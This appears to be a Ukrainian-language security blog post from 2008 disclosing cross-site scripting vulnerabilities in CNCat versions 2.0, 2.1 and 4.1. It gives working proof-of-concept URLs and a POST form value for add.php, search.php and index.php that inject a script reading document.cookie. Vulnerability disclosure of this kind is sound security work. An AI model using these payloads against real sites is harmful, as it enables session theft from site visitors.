Уразливості в CNCat
23:58 15.07.2008Ще в 2006 році (одну 16.04.2006, а ще дві 03.08.2006) я знайшов Cross-Site Scripting уразливості в CNCat (каталог лінок). Дірки я виявив на сайті свого друга (і оперативно сповістив його). Також про дані XSS я розповідав, коли писав про уразливості на www.catalog-security.com.ua.
Враховуючи, що уразливості (першу з них) я знайшов ще коли в мене не було даного сайта, в часи коли я почав активно займатися веб безпекою, тому дана інформація в мене дещо відклалася. Про уразливості я найближчим часом повідомлю розробникам системи.
XSS:
Уразливості в add.php (можна як через GET, так і через POST), search.php та index.php.
http://site/add.php?description=%3C/textarea%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/search.php?q=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?c=0&o=0%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Уразлива версія CNCat 2.0 та попередні версії.
Як я сьогодні перевірив, CNCat 2.1 також уразливий - в index.php та для POST запиту в add.php.
XSS:
http://site/?c=0&o=0%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
POST запит на сторінці http://site/add.php
</textarea><script>alert(document.cookie)</script>
В полі Описание.
CNCat 4.1 також уразливий , як я сьогодні перевірив (але в ньому інша уразливість). Про що я напишу окремо.